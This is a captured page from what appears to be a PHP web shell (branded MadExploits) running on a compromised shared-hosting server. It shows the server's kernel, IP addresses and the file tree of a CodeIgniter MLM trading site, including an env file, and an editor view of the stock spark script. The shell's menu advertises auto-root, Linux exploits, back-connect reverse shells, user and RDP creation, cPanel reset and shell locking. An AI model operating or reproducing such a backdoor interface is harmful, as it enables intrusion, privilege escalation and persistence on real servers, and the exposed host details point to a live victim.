Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.223
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
mlm.tradesense.co.ke /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
mlmdesign
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
writable
[ DIR ]
drwxr-xr-x
.no-header.php-cs-fixer.dist.p...
1.4
KB
-rw-r--r--
CHANGELOG.md
363.99
KB
-rw-r--r--
CONTRIBUTING.md
249
B
-rw-r--r--
LICENSE
1.13
KB
-rw-r--r--
README.md
4.9
KB
-rw-r--r--
SECURITY.md
1.37
KB
-rw-r--r--
composer.json
2.43
KB
-rw-r--r--
depfile.yaml
5.01
KB
-rw-r--r--
env
4.4
KB
-rw-r--r--
mlmdesign.zip
8.67
MB
-rw-r--r--
phpstan-baseline.neon.dist
33.38
KB
-rw-r--r--
spark
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : spark
#!/usr/bin/env php <?php /* * -------------------------------------------------------------------- * CodeIgniter command-line tools * -------------------------------------------------------------------- * The main entry point into the CLI system and allows you to run * commands and perform maintenance on your application. * * Because CodeIgniter can handle CLI requests as just another web request * this class mainly acts as a passthru to the framework itself. */ define('SPARKED', true); /* *--------------------------------------------------------------- * BOOTSTRAP THE APPLICATION *--------------------------------------------------------------- * This process sets up the path constants, loads and registers * our autoloader, along with Composer's, loads our constants * and fires up an environment-specific bootstrapping. */ // Refuse to run when called from php-cgi if (strpos(PHP_SAPI, 'cgi') === 0) { exit("The cli tool is not supported when running php-cgi. It needs php-cli to function!\n\n"); } // Path to the front controller define('FCPATH', __DIR__ . DIRECTORY_SEPARATOR . 'public' . DIRECTORY_SEPARATOR); // Load our paths config file $pathsConfig = 'app/Config/Paths.php'; // ^^^ Change this line if you move your application folder require realpath($pathsConfig) ?: $pathsConfig; $paths = new Config\Paths(); // Ensure the current directory is pointing to the front controller's directory chdir(FCPATH); $bootstrap = rtrim($paths->systemDirectory, '\\/ ') . DIRECTORY_SEPARATOR . 'bootstrap.php'; $app = require realpath($bootstrap) ?: $bootstrap; // Grab our Console $console = new CodeIgniter\CLI\Console($app); // We want errors to be shown when using it from the CLI. error_reporting(-1); ini_set('display_errors', '1'); // Show basic information before we do anything else. if (is_int($suppress = array_search('--no-header', $_SERVER['argv'], true))) { unset($_SERVER['argv'][$suppress]); // @codeCoverageIgnore $suppress = true; } $console->showHeader($suppress); // fire off the command in the main framework. $response = $console->run(); if ($response->getStatusCode() >= 300) { exit($response->getStatusCode()); }
Close